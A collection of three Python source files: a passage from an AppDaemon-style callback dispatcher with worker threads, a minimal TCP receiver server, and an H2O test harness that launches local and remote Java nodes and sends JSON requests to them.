executed = await self.dispatch_worker(name, {
"id": uuid_,
"name": name,
"objectid": self.AD.app_management.objects[name]["id"],
"type": "state",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new_state,
"old_state": old_state,
"pin_app": pin_app,
"pin_thread": pin_thread,
"kwargs": kwargs,
})
else:
#
# Let's figure out if we need to run a callback
#
# Start by figuring out what the incoming old value was
#
if old_state is None:
old = None
else:
if attribute in old_state:
old = old_state[attribute]
elif 'attributes' in old_state and attribute in old_state['attributes']:
old = old_state['attributes'][attribute]
else:
old = None
#
# Now the incoming new value
#
if new_state is None:
new = None
else:
if attribute in new_state:
new = new_state[attribute]
elif 'attributes' in new_state and attribute in new_state['attributes']:
new = new_state['attributes'][attribute]
else:
new = None
#
# Don't do anything unless there has been a change
#
if new != old:
if "__duration" in kwargs:
#
# We have a pending timer for this, but we are coming around again.
# Either we will start a new timer if the conditions are met
# Or we won't if they are not.
# Either way, we cancel the old timer
#
await self.AD.sched.cancel_timer(name, kwargs["__duration"])
#
# Check if we care about the change
#
if (cold is None or cold == old) and (cnew is None or cnew == new):
#
# We do!
#
if "duration" in kwargs:
#
# Set a timer
#
exec_time = await self.AD.sched.get_now() + timedelta(seconds=int(kwargs["duration"]))
#
# If it's a oneshot, scheduler will delete the callback once it has executed,
# We need to give it the handle so it knows what to delete
#
if kwargs.get("oneshot", False):
kwargs["__handle"] = uuid_
#
# We're not executing the callback immediately so let's schedule it
# Unless we intercede and cancel it, the callback will happen in "duration" seconds
#
kwargs["__duration"] = await self.AD.sched.insert_schedule(
name, exec_time, funcref, False, None,
__entity=entity,
__attribute=attribute,
__old_state=old,
__new_state=new, **kwargs
)
else:
#
# Not a delay so make the callback immediately
#
executed = await self.dispatch_worker(name, {
"id": uuid_,
"name": name,
"objectid": self.AD.app_management.objects[name]["id"],
"type": "state",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new,
"old_state": old,
"pin_app": pin_app,
"pin_thread": pin_thread,
"kwargs": kwargs
})
return executed
async def dispatch_worker(self, name, args):
unconstrained = True
#
# Argument Constraints
#
for arg in self.AD.app_management.app_config[name].keys():
constrained = await self.check_constraint(arg, self.AD.app_management.app_config[name][arg], self.AD.app_management.objects[name]["object"])
if not constrained:
unconstrained = False
if not await self.check_time_constraint(self.AD.app_management.app_config[name], name):
unconstrained = False
elif not await self.check_days_constraint(self.AD.app_management.app_config[name], name):
unconstrained = False
#
# Callback level constraints
#
myargs = utils.deepcopy(args)
if "kwargs" in myargs:
for arg in myargs["kwargs"].keys():
constrained = await self.check_constraint(arg, myargs["kwargs"][arg], self.AD.app_management.objects[name]["object"])
if not constrained:
unconstrained = False
if not await self.check_time_constraint(myargs["kwargs"], name):
unconstrained = False
elif not await self.check_days_constraint(myargs["kwargs"], name):
unconstrained = False
if unconstrained:
#
# It's going to happen
#
await self.add_to_state("_threading", "admin", "sensor.callbacks_total_fired", 1)
await self.add_to_attr("_threading", "admin", "{}_callback.{}".format(myargs["type"], myargs["id"]), "fired", 1)
#
# And Q
#
if asyncio.iscoroutinefunction(myargs["function"]):
f = asyncio.ensure_future(self.async_worker(myargs))
self.AD.futures.add_future(name, f)
else:
self.select_q(myargs)
return True
else:
return False
# noinspection PyBroadException
async def async_worker(self, args):
thread_id = threading.current_thread().name
_type = args["type"]
funcref = args["function"]
_id = args["id"]
objectid = args["objectid"]
name = args["name"]
error_logger = logging.getLogger("Error.{}".format(name))
args["kwargs"]["__thread_id"] = thread_id
callback = "{}() in {}".format(funcref.__name__, name)
app = await self.AD.app_management.get_app_instance(name, objectid)
if app is not None:
try:
if _type == "scheduler":
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
except TypeError as e:
self.report_callback_sig(name, "scheduler", funcref, args)
elif _type == "state":
try:
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(entity, attr, old_state, new_state, self.AD.state.sanitize_state_kwargs(app, args["kwargs"]))
except TypeError as e:
self.report_callback_sig(name, "state", funcref, args)
elif _type == "event":
data = args["data"]
if args["event"] == "__AD_LOG_EVENT":
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(data["app_name"], data["ts"], data["level"], data["log_type"], data["message"], args["kwargs"])
except TypeError as e:
self.report_callback_sig(name, "log_event", funcref, args)
else:
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(args["event"], data, args["kwargs"])
except TypeError as e:
self.report_callback_sig(name, "event", funcref, args)
except:
error_logger.warning('-' * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning( "Worker Ags: %s", args)
error_logger.warning('-' * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning('-' * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
finally:
pass
await self.update_thread_info("async", "idle", name, _type, _id)
else:
if not self.AD.stopping:
self.logger.warning("Found stale callback for %s - discarding", name)
# noinspection PyBroadException
def worker(self):
thread_id = threading.current_thread().name
q = self.get_q(thread_id)
while True:
args = q.get()
_type = args["type"]
funcref = args["function"]
_id = args["id"]
objectid = args["objectid"]
name = args["name"]
error_logger = logging.getLogger("Error.{}".format(name))
args["kwargs"]["__thread_id"] = thread_id
callback = "{}() in {}".format(funcref.__name__, name)
app = utils.run_coroutine_threadsafe(self, self.AD.app_management.get_app_instance(name, objectid))
if app is not None:
try:
if _type == "scheduler":
try:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
except TypeError:
self.report_callback_sig(name, "scheduler", funcref, args)
elif _type == "state":
try:
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(entity, attr, old_state, new_state,
self.AD.state.sanitize_state_kwargs(app, args["kwargs"]))
except TypeError:
self.report_callback_sig(name, "state", funcref, args)
elif _type == "event":
data = args["data"]
if args["event"] == "__AD_LOG_EVENT":
try:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(data["app_name"], data["ts"], data["level"], data["log_type"], data["message"], args["kwargs"])
except TypeError:
self.report_callback_sig(name, "log_event", funcref, args)
else:
try:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(args["event"], data, args["kwargs"])
except TypeError:
self.report_callback_sig(name, "event", funcref, args)
except:
error_logger.warning('-' * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning( "Worker Ags: %s", args)
error_logger.warning('-' * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning('-' * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
finally:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, "idle", name, _type, _id))
else:
if not self.AD.stopping:
self.logger.warning("Found stale callback for %s - discarding", name)
q.task_done()
def report_callback_sig(self, name, type, funcref, args):
callback_args = {
"scheduler": {"count": 1, "signature": "f(self, kwargs)"},
"state": {"count": 5, "signature": "f(self, entity, attribute, old, new, kwargs)"},
"event": {"count": 3, "signature": "f(self, event, data, kwargs)"},
"log_event": {"count": 6, "signature": "f(self, name, ts, level, type, message, kwargs)"},
"initialize": {"count": 0, "signature": "initialize()"},
"terminate": {"count": 0, "signature": "terminate()"}
}
sig = inspect.signature(funcref)
if type in callback_args:
if len(sig.parameters) != callback_args[type]["count"]:
self.logger.warning("Suspect incorrect signature type for callback %s() in %s, should be %s - discarding", funcref.__name__, name, callback_args[type]["signature"])
error_logger = logging.getLogger("Error.{}".format(name))
error_logger.warning('-' * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning("Worker Ags: %s", args)
error_logger.warning('-' * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning('-' * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
else:
self.logger.error("Unknown callback type: %s", type)
|
recv_t.py | import time
import socket
import sys
# import rospy
import traceback
from threading import Thread
def client_thread(conn):
is_active = True
data = conn.recv(1024)
print(data)
is_active = False
conn.close()
def start_server():
# rospy.init_node("receiver") # initial ros node
HOST = '' # Standard loopback interface address (localhost)
PORT = 4000 # Port to listen on (non-privileged ports are > 1023)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind socket to local host and port
try:
s.bind((HOST, PORT))
except socket.error as msg:
print ("Bind failed. Error Code : %s message % " % (str(msg[0]), str(msg[1])))
sys.exit()
s.listen(1000)
while True:
conn, addr = s.accept()
try:
Thread(target=client_thread, args=[conn]).start()
except:
print("Thread did not start.")
traceback.print_exc()
s.close()
def main():
start_server()
if __name__ == "__main__":
main()
|
h2o_objects.py | import sys, getpass, os, psutil, time, requests, errno, threading, inspect, shlex
import h2o_os_util, h2o_print as h2p, h2o_args
import h2o_nodes
from h2o_test import \
tmp_dir, tmp_file, flatfile_pathname, spawn_cmd, find_file, verboseprint, \
dump_json, log, check_sandbox_for_errors
import json, platform, re
from h2o_test import dump_json
# print "h2o_objects"
# used to drain stdout on the h2o objects below (before terminating a node)
def __drain(src, dst):
for l in src:
if type(dst) == type(0):
# got this with random data to parse.. why? it shows up in our stdout?
# UnicodeEncodeError: 'ascii' codec can't encode character u'\x86' in position 60:
# ordinal not in range(128)
# could we be getting unicode object?
try:
os.write(dst, l)
except:
# os.write(dst,"kbn: non-ascii char in the next line?")
os.write(dst,l.encode('utf8'))
else:
# FIX! this case probably can have the same issue?
dst.write(l)
dst.flush()
src.close()
if type(dst) == type(0):
os.close(dst)
def drain(src, dst):
t = threading.Thread(target=__drain, args=(src, dst))
t.daemon = True
t.start()
#*****************************************************************
class H2O(object):
def __init__(self,
use_this_ip_addr=None, port=54321, capture_output=True,
force_ip=False, network=None,
use_debugger=None, classpath=None,
use_hdfs=False, use_maprfs=False,
hdfs_version=None, hdfs_name_node=None, hdfs_config=None,
aws_credentials=None,
use_flatfile=False, java_heap_GB=None, java_heap_MB=None, java_extra_args=None,
use_home_for_ice=False, node_id=None, username=None,
random_udp_drop=False, force_tcp=False,
redirect_import_folder_to_s3_path=None,
redirect_import_folder_to_s3n_path=None,
disable_h2o_log=False,
enable_benchmark_log=False,
h2o_remote_buckets_root=None,
delete_keys_at_teardown=False,
cloud_name=None,
disable_assertions=None,
sandbox_ignore_errors=False,
):
if use_hdfs:
# see if we can touch a 0xdata machine
try:
# long timeout in ec2...bad
a = requests.get('http://172.16.2.176:80', timeout=1)
hdfs_0xdata_visible = True
except:
hdfs_0xdata_visible = False
# different defaults, depending on where we're running
if hdfs_name_node is None:
if hdfs_0xdata_visible:
hdfs_name_node = "172.16.2.176"
else: # ec2
hdfs_name_node = "10.78.14.235:9000"
if hdfs_version is None:
if hdfs_0xdata_visible:
hdfs_version = "cdh4"
else: # ec2
hdfs_version = "0.20.2"
self.redirect_import_folder_to_s3_path = redirect_import_folder_to_s3_path
self.redirect_import_folder_to_s3n_path = redirect_import_folder_to_s3n_path
self.aws_credentials = aws_credentials
self.port = port
# None is legal for self.h2o_addr.
# means we won't give an ip to the jar when we start.
# Or we can say use use_this_ip_addr=127.0.0.1, or the known address
# if use_this_addr is None, use 127.0.0.1 for urls and json
# Command line arg 'ip_from_cmd_line' dominates:
# ip_from_cmd_line and use_this_ip_addr shouldn't be used for mutli-node
if h2o_args.ip_from_cmd_line:
self.h2o_addr = h2o_args.ip_from_cmd_line
else:
self.h2o_addr = use_this_ip_addr
self.force_ip = force_ip or (self.h2o_addr!=None)
if self.h2o_addr:
self.http_addr = self.h2o_addr
else:
self.http_addr = h2o_args.python_cmd_ip
if h2o_args.network_from_cmd_line:
self.network = h2o_args.network_from_cmd_line
else:
self.network = network
# command line should always dominate for enabling
if h2o_args.debugger: use_debugger = True
self.use_debugger = use_debugger
self.classpath = classpath
self.capture_output = capture_output
self.use_hdfs = use_hdfs
self.use_maprfs = use_maprfs
self.hdfs_name_node = hdfs_name_node
self.hdfs_version = hdfs_version
self.hdfs_config = hdfs_config
self.use_flatfile = use_flatfile
self.java_heap_GB = java_heap_GB
self.java_heap_MB = java_heap_MB
self.java_extra_args = java_extra_args
self.use_home_for_ice = use_home_for_ice
self.node_id = node_id
if username:
self.username = username
else:
self.username = getpass.getuser()
# don't want multiple reports from tearDown and tearDownClass
# have nodes[0] remember (0 always exists)
self.sandbox_error_was_reported = False
self.sandbox_ignore_errors = sandbox_ignore_errors
self.random_udp_drop = random_udp_drop
self.force_tcp = force_tcp
self.disable_h2o_log = disable_h2o_log
# this dumps stats from tests, and perf stats while polling to benchmark.log
self.enable_benchmark_log = enable_benchmark_log
self.h2o_remote_buckets_root = h2o_remote_buckets_root
self.delete_keys_at_teardown = delete_keys_at_teardown
self.disable_assertions = disable_assertions
if cloud_name:
self.cloud_name = cloud_name
else:
self.cloud_name = 'pytest-%s-%s' % (getpass.getuser(), os.getpid())
def __str__(self):
return '%s - http://%s:%d/' % (type(self), self.http_addr, self.port)
def url(self, loc, port=None):
# always use the new api port
if port is None: port = self.port
if loc.startswith('/'):
delim = ''
else:
delim = '/'
u = 'http://%s:%d%s%s' % (self.http_addr, port, delim, loc)
return u
def do_json_request(self, jsonRequest=None, fullUrl=None, timeout=10, params=None, postData=None, returnFast=False,
cmd='get', extraComment=None, ignoreH2oError=False, noExtraErrorCheck=False, **kwargs):
# if url param is used, use it as full url. otherwise crate from the jsonRequest
if fullUrl:
url = fullUrl
else:
url = self.url(jsonRequest)
# remove any params that are 'None'
# need to copy dictionary, since can't delete while iterating
if params is not None:
params2 = params.copy()
for k in params2:
if params2[k] is None:
del params[k]
paramsStr = '?' + '&'.join(['%s=%s' % (k, v) for (k, v) in params.items()])
else:
paramsStr = ''
extraComment2 = " " + repr(postData)+";" if cmd=='post' else ""
extraComment2 += extraComment if extraComment else ""
if len(extraComment2) > 0:
log('Start ' + url + paramsStr, comment=extraComment2)
else:
log('Start ' + url + paramsStr)
# file get passed thru kwargs here
if h2o_args.no_timeout:
timeout = None # infinite
try:
if 'post' == cmd:
# NOTE == cmd: for now, since we don't have deserialization from JSON in h2o-dev, we use form-encoded POST.
# This is temporary.
#
# This following does application/json (aka, posting JSON in the body):
# r = requests.post(url, timeout=timeout, params=params, data=json.dumps(postData), **kwargs)
#
# This does form-encoded, which doesn't allow POST of nested structures
r = requests.post(url, timeout=timeout, params=params, data=postData, **kwargs)
elif 'delete' == cmd:
r = requests.delete(url, timeout=timeout, params=params, **kwargs)
elif 'get' == cmd:
r = requests.get(url, timeout=timeout, params=params, **kwargs)
else:
raise ValueError("Unknown HTTP command (expected 'get', 'post' or 'delete'): " + cmd)
except Exception, e:
# rethrow the exception after we've checked for stack trace from h2o
# out of memory errors maybe don't show up right away? so we should wait for h2o
# to get it out to h2o stdout. We don't want to rely on cloud teardown to check
# because there's no delay, and we don't want to delay all cloud teardowns by waiting.
exc_info = sys.exc_info()
# use this to ignore the initial connection errors during build cloud when h2o is coming up
if not noExtraErrorCheck:
h2p.red_print(
"ERROR: got exception on %s to h2o. \nGoing to check sandbox, then rethrow.." % (url + paramsStr))
time.sleep(2)
check_sandbox_for_errors(python_test_name=h2o_args.python_test_name);
raise exc_info[1], None, exc_info[2]
if 200 != r.status_code:
print "JSON call returned non-200 status with ", (url + paramsStr)
print "r.status_code: " + str(r.status_code)
print "r.headers: " + repr(r.headers)
print "r.text: " + r.text
# fatal if no response
# FIX! why is this not working on bad response to GLM
# if not r:
# raise Exception("Maybe bad url? no r in do_json_request in %s:" % inspect.stack()[1][3])
# this is used to open a browser on results, or to redo the operation in the browser
# we don't' have that may urls flying around, so let's keep them all
# FIX! this doesn't work now with all the extra post data required?
h2o_nodes.json_url_history.append(r.url)
# if r.json():
# raise Exception("Maybe bad url? no r.json in do_json_request in %s:" % inspect.stack()[1][3])
rjson = None
if returnFast:
return
try:
# h2o-dev sometimes is returning ISO-8859-2, Latin-2?
## print "apparent_coding", r.apparent_encoding
r.encoding = 'utf-8'
rjson = r.json()
except:
h2p.red_print("r.text:", r.text.encode('utf8'))
try:
# try to decode the r.text?
if not isinstance(json.loads(r.text), (list, dict)):
raise Exception("h2o json responses should always be lists or dicts, see previous for text")
except:
raise Exception("Could not decode any json from the request %s." % r.text)
# TODO: we should really only look in the response object. This check
# prevents us from having a field called "error" (e.g., for a scoring result).
for e in ['error', 'Error', 'errors', 'Errors']:
# error can be null (python None). This happens in exec2
if e in rjson and rjson[e]:
print "rjson:", dump_json(rjson)
emsg = 'rjson %s in %s: %s' % (e, inspect.stack()[1][3], rjson[e])
if ignoreH2oError:
# well, we print it..so not totally ignore. test can look at rjson returned
print emsg
else:
print emsg
raise Exception(emsg)
for w in ['warning', 'Warning', 'warnings', 'Warnings']:
# warning can be null (python None).
if w in rjson and rjson[w]:
verboseprint(dump_json(rjson))
print 'rjson %s in %s: %s' % (w, inspect.stack()[1][3], rjson[w])
return rjson
def stabilize(self, test_func, error, timeoutSecs=10, retryDelaySecs=0.5):
'''Repeatedly test a function waiting for it to return True.
Arguments:
test_func -- A function that will be run repeatedly
error -- A function that will be run to produce an error message
it will be called with (node, timeTakenSecs, numberOfRetries)
OR
-- A string that will be interpolated with a dictionary of
{ 'timeTakenSecs', 'numberOfRetries' }
timeoutSecs -- How long in seconds to keep trying before declaring a failure
retryDelaySecs -- How long to wait between retry attempts
'''
start = time.time()
numberOfRetries = 0
while h2o_args.no_timeout or (time.time() - start < timeoutSecs):
if test_func(self, tries=numberOfRetries, timeoutSecs=timeoutSecs):
break
time.sleep(retryDelaySecs)
numberOfRetries += 1
# hey, check the sandbox if we've been waiting a long time...rather than wait for timeout
# to find the badness?. can check_sandbox_for_errors at any time
if ((numberOfRetries % 50) == 0):
check_sandbox_for_errors(python_test_name=h2o_args.python_test_name)
else:
timeTakenSecs = time.time() - start
if isinstance(error, type('')):
raise Exception('%s failed after %.2f seconds having retried %d times' % (
error, timeTakenSecs, numberOfRetries))
else:
msg = error(self, timeTakenSecs, numberOfRetries)
raise Exception(msg)
def wait_for_node_to_accept_connections(self, nodeList, timeoutSecs=15, noExtraErrorCheck=False):
verboseprint("wait_for_node_to_accept_connections")
def test(n, tries=None, timeoutSecs=timeoutSecs):
try:
n.get_cloud(noExtraErrorCheck=noExtraErrorCheck, timeoutSecs=timeoutSecs)
return True
except requests.ConnectionError, e:
# Now using: requests 1.1.0 (easy_install --upgrade requests) 2/5/13
# Now: assume all requests.ConnectionErrors are H2O legal connection errors.
# Have trouble finding where the errno is, fine to assume all are good ones.
# Timeout check will kick in if continued H2O badness.
return False
# get their http addr to represent the nodes
expectedCloudStr = ",".join([str(n) for n in nodeList])
self.stabilize(test, error=('waiting for initial connection: Expected cloud %s' % expectedCloudStr),
timeoutSecs=timeoutSecs, # with cold cache's this can be quite slow
retryDelaySecs=0.1) # but normally it is very fast
def sandbox_error_report(self, done=None):
# not clearable..just or in new value
if done:
self.sandbox_error_was_reported = True
return (self.sandbox_error_was_reported)
def get_args(self):
args = ['java']
# I guess it doesn't matter if we use flatfile for both now
# defaults to not specifying
# FIX! we need to check that it's not outside the limits of the dram of the machine it's running on?
if self.java_heap_GB is not None:
if not (1 <= self.java_heap_GB <= 256):
raise Exception('java_heap_GB <1 or >256 (GB): %s' % (self.java_heap_GB))
args += ['-Xms%dG' % self.java_heap_GB]
args += ['-Xmx%dG' % self.java_heap_GB]
if self.java_heap_MB is not None:
if not (1 <= self.java_heap_MB <= 256000):
raise Exception('java_heap_MB <1 or >256000 (MB): %s' % (self.java_heap_MB))
args += ['-Xms%dm' % self.java_heap_MB]
args += ['-Xmx%dm' % self.java_heap_MB]
if self.java_extra_args is not None:
args += ['%s' % self.java_extra_args]
if self.use_debugger:
# currently hardwire the base port for debugger to 8000
# increment by one for every node we add
# sence this order is different than h2o cluster order, print out the ip and port for the user
# we could save debugger_port state per node, but not really necessary (but would be more consistent)
debuggerBasePort = 8000
if self.node_id is None:
debuggerPort = debuggerBasePort
else:
debuggerPort = debuggerBasePort + self.node_id
if self.http_addr:
a = self.http_addr
else:
a = "localhost"
if self.port:
b = str(self.port)
else:
b = "h2o determined"
# I guess we always specify port?
print "You can attach debugger at port %s for jvm at %s:%s" % (debuggerPort, a, b)
args += ['-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=%s' % debuggerPort]
if self.disable_assertions:
print "WARNING: h2o is running with assertions disabled"
else:
args += ["-ea"]
if self.use_maprfs:
args += ["-Djava.library.path=/opt/mapr/lib"]
if self.classpath:
entries = [find_file('build/classes'), find_file('lib/javassist.jar')]
entries += glob.glob(find_file('lib') + '/*/*.jar')
entries += glob.glob(find_file('lib') + '/*/*/*.jar')
args += ['-classpath', os.pathsep.join(entries), 'water.Boot']
else:
args += ["-jar", self.get_h2o_jar()]
if 1==1:
if self.hdfs_config:
args += [
'-hdfs_config ' + self.hdfs_config
]
if h2o_args.beta_features:
# no -beta
# args += ["-beta"]
pass
if self.network:
args += ["-network " + self.network]
# H2O should figure it out, if not specified
# DON"T EVER USE on multi-machine...h2o should always get it right, to be able to run on hadoop
# where it's not told
# new 10/22/14. Allow forcing the ip when we do remote, for networks with bridges, where
# h2o can't self identify (does -network work?)
if self.force_ip and self.h2o_addr: # should always have an addr if force_ip...but..
args += [
'-ip %s' % self.h2o_addr,
]
# Need to specify port, since there can be multiple ports for an ip in the flatfile
if self.port is not None:
args += [
"-port %d" % self.port,
]
if self.use_flatfile:
args += [
'-flatfile ' + self.flatfile,
]
args += [
'-ice_root %s' % self.get_ice_dir(),
# if I have multiple jenkins projects doing different h2o clouds, I need
# I need different ports and different cloud name.
# does different cloud name prevent them from joining up
# (even if same multicast ports?)
# I suppose I can force a base address. or run on another machine?
]
args += [
'-name ' + self.cloud_name
]
# ignore the other -hdfs args if the config is used?
if 1==0:
if self.hdfs_config:
args += [
'-hdfs_config ' + self.hdfs_config
]
if self.use_hdfs:
args += [
# it's fine if hdfs_name has a ":9000" port or something too
'-hdfs hdfs://' + self.hdfs_name_node,
'-hdfs_version ' + self.hdfs_version,
]
if self.use_maprfs:
args += [
# 3 slashes?
'-hdfs maprfs:///' + self.hdfs_name_node,
'-hdfs_version ' + self.hdfs_version,
]
if self.aws_credentials:
args += ['-aws_credentials ' + self.aws_credentials]
# passed thru build_cloud in test, or global from commandline arg
if self.random_udp_drop or h2o_args.random_udp_drop:
args += ['-random_udp_drop']
if self.force_tcp:
args += ['-force_tcp']
if self.disable_h2o_log:
args += ['-nolog']
# psutil psopen needs param/value in different arg elements
# othetwise we'd need to pass as joined string, and run /bin/sh
# this joins them up with space, then splits on space.
# works as long as no pathnames have embedded space, which should be true
# for unix, maybe not windows. For windows we join them as string before use in psopen
argsSplitByWhiteSpace = " ".join(args).split()
return argsSplitByWhiteSpace
#*****************************************************************
import h2o_methods
class LocalH2O(H2O):
'''An H2O instance launched by the python framework on the local host using psutil'''
def __init__(self, *args, **kwargs):
super(LocalH2O, self).__init__(*args, **kwargs)
self.rc = None
# FIX! no option for local /home/username ..always the sandbox (LOG_DIR)
self.ice = tmp_dir('ice.')
self.flatfile = flatfile_pathname()
# so we can tell if we're remote or local. Apparently used in h2o_import.py
self.remoteH2O = False
h2o_os_util.check_port_group(self.port)
h2o_os_util.show_h2o_processes()
if self.node_id is not None:
logPrefix = 'local-h2o-' + str(self.node_id)
else:
logPrefix = 'local-h2o'
# see https://docs.python.org/2/library/subprocess.html#subprocess.Popen
# for why I'm using shlex to split the cmd string into a sequence
# confusing issues, especially when thinking about windows too
# OS/build | os.name | platform.system()
# -------------+---------+-----------------------
# Win32 native | nt | Windows
# Win32 cygwin | posix | CYGWIN_NT-5.1*
# Win64 native | nt | Windows
# Win64 cygwin | posix | CYGWIN_NT-6.1-WOW64*
# Linux | posix | Linux
# make it a string if cygwin or windows
# in unix, the args was created with split by space. (assumption is no pathname has space)
# need to pass string in windows..doesn't seem to assemble string from args list correctly
# could make unix use shell and pass string?
pf = platform.system()
print "System is %s" % pf
cmd = self.get_args()
if re.match('win', pf, re.IGNORECASE): # covers cygwin and windows
cmd = " ".join(cmd)
spawn = spawn_cmd(logPrefix, cmd=cmd, capture_output=self.capture_output)
self.ps = spawn[0]
def get_h2o_jar(self):
return find_file('build/h2o.jar')
def get_flatfile(self):
return self.flatfile
# return find_file(flatfile_pathname())
def get_ice_dir(self):
return self.ice
def is_alive(self):
verboseprint("Doing is_alive check for LocalH2O", self.wait(0))
return self.wait(0) is None
def terminate_self_only(self):
def on_terminate(proc):
print("process {} terminated".format(proc))
waitingForKill = False
try:
# we already sent h2o shutdown and waited a second. Don't bother checking if alive still.
# send terminate...wait up to 3 secs, then send kill
self.ps.terminate()
gone, alive = wait_procs(procs=[self.ps], timeout=3, callback=on_terminate)
if alive:
self.ps.kill()
# from http://code.google.com/p/psutil/wiki/Documentation: wait(timeout=None) Wait for process termination
# If the process is already terminated does not raise NoSuchProcess exception but just return None immediately.
# If timeout is specified and process is still alive raises TimeoutExpired exception.
# hmm. maybe we're hitting the timeout
waitingForKill = True
return self.wait(timeout=3)
except psutil.NoSuchProcess:
return -1
except:
if waitingForKill:
# this means we must have got the exception on the self.wait()
# just print a message
print "\nUsed psutil to kill h2o process...but"
print "It didn't die within 2 secs. Maybe will die soon. Maybe not! At: %s" % self.http_addr
else:
print "Unexpected exception in terminate_self_only: ignoring"
# hack.
# psutil 2.x needs function reference
# psutil 1.x needs object reference
if hasattr(self.ps.cmdline, '__call__'):
pcmdline = self.ps.cmdline()
else:
pcmdline = self.ps.cmdline
print "process cmdline:", pcmdline
return -1
def terminate(self):
# send a shutdown request first.
# since local is used for a lot of buggy new code, also do the ps kill.
# try/except inside shutdown_all now
if self.is_alive():
print "\nShutdown didn't work fast enough for local node? : %s. Will kill though" % self
self.terminate_self_only()
def wait(self, timeout=0):
if self.rc is not None:
return self.rc
try:
self.rc = self.ps.wait(timeout)
return self.rc
except psutil.TimeoutExpired:
return None
def stack_dump(self):
self.ps.send_signal(signal.SIGQUIT)
# to see all the methods
# print dump_json(dir(LocalH2O))
#*****************************************************************
class RemoteH2O(H2O):
'''An H2O instance launched by the python framework on a specified host using openssh'''
def __init__(self, host, *args, **kwargs):
super(RemoteH2O, self).__init__(*args, **kwargs)
# it gets set True if an address is specified for LocalH2o init. Override.
if 'force_ip' in kwargs:
self.force_ip = kwargs['force_ip']
self.remoteH2O = True # so we can tell if we're remote or local
self.jar = host.upload_file('build/h2o.jar')
# need to copy the flatfile. We don't always use it (depends on h2o args)
self.flatfile = host.upload_file(flatfile_pathname())
# distribute AWS credentials
if self.aws_credentials:
self.aws_credentials = host.upload_file(self.aws_credentials)
if self.hdfs_config:
self.hdfs_config = host.upload_file(self.hdfs_config)
if self.use_home_for_ice:
# this will be the username used to ssh to the host
self.ice = "/home/" + host.username + '/ice.%d.%s' % (self.port, time.time())
else:
self.ice = '/tmp/ice.%d.%s' % (self.port, time.time())
self.channel = host.open_channel()
### FIX! TODO...we don't check on remote hosts yet
# this fires up h2o over there
cmd = ' '.join(self.get_args())
# UPDATE: somehow java -jar on cygwin target (xp) can't handle /tmp/h2o*jar
# because it's a windows executable and expects windows style path names.
# but if we cd into /tmp, it can do java -jar h2o*jar.
# So just split out the /tmp (pretend we don't know) and the h2o jar file name
# Newer windows may not have this problem? Do the ls (this goes into the local stdout
# files) so we can see the file is really where we expect.
# This hack only works when the dest is /tmp/h2o*jar. It's okay to execute
# with pwd = /tmp. If /tmp/ isn't in the jar path, I guess things will be the same as
# normal.
if 1 == 0: # enable if you want windows remote machines
cmdList = ["cd /tmp"] # separate by ;<space> when we join
cmdList += ["ls -ltr " + self.jar]
cmdList += [re.sub("/tmp/", "", cmd)]
self.channel.exec_command("; ".join(cmdList))
else:
self.channel.exec_command(cmd)
if self.capture_output:
if self.node_id is not None:
logPrefix = 'remote-h2o-' + str(self.node_id)
else:
logPrefix = 'remote-h2o'
logPrefix += '-' + host.h2o_addr
outfd, outpath = tmp_file(logPrefix + '.stdout.', '.log')
errfd, errpath = tmp_file(logPrefix + '.stderr.', '.log')
drain(self.channel.makefile(), outfd)
drain(self.channel.makefile_stderr(), errfd)
comment = 'Remote on %s, stdout %s, stderr %s' % (
self.h2o_addr, os.path.basename(outpath), os.path.basename(errpath))
else:
drain(self.channel.makefile(), sys.stdout)
drain(self.channel.makefile_stderr(), sys.stderr)
comment = 'Remote on %s' % self.h2o_addr
log(cmd, comment=comment)
def get_h2o_jar(self):
return self.jar
def get_flatfile(self):
return self.flatfile
def get_ice_dir(self):
return self.ice
def is_alive(self):
verboseprint("Doing is_alive check for RemoteH2O")
if self.channel.closed: return False
if self.channel.exit_status_ready(): return False
try:
self.get_cloud(noExtraErrorCheck=True)
return True
except:
return False
def terminate_self_only(self):
self.channel.close()
# Don't check afterwards. api watchdog in h2o might complain
if 1==0:
time.sleep(1) # a little delay needed?
# kbn: it should be dead now? want to make sure we don't have zombies
# we should get a connection error. doing a is_alive subset.
try:
gc_output = self.get_cloud(noExtraErrorCheck=True)
raise Exception("get_cloud() should fail after we terminate a node. It isn't. %s %s" % (self, gc_output))
except:
return True
def terminate(self):
self.terminate_self_only()
#*****************************************************************
class ExternalH2O(H2O):
'''A cloned H2O instance assumed to be created by others, that we can interact with via json requests (urls)
Gets initialized with state from json created by another build_cloud, so all methods should work 'as-if"
the cloud was built by the test (normally).
The normal build_cloud() parameters aren't passed here, the final node state is! (and used for init)
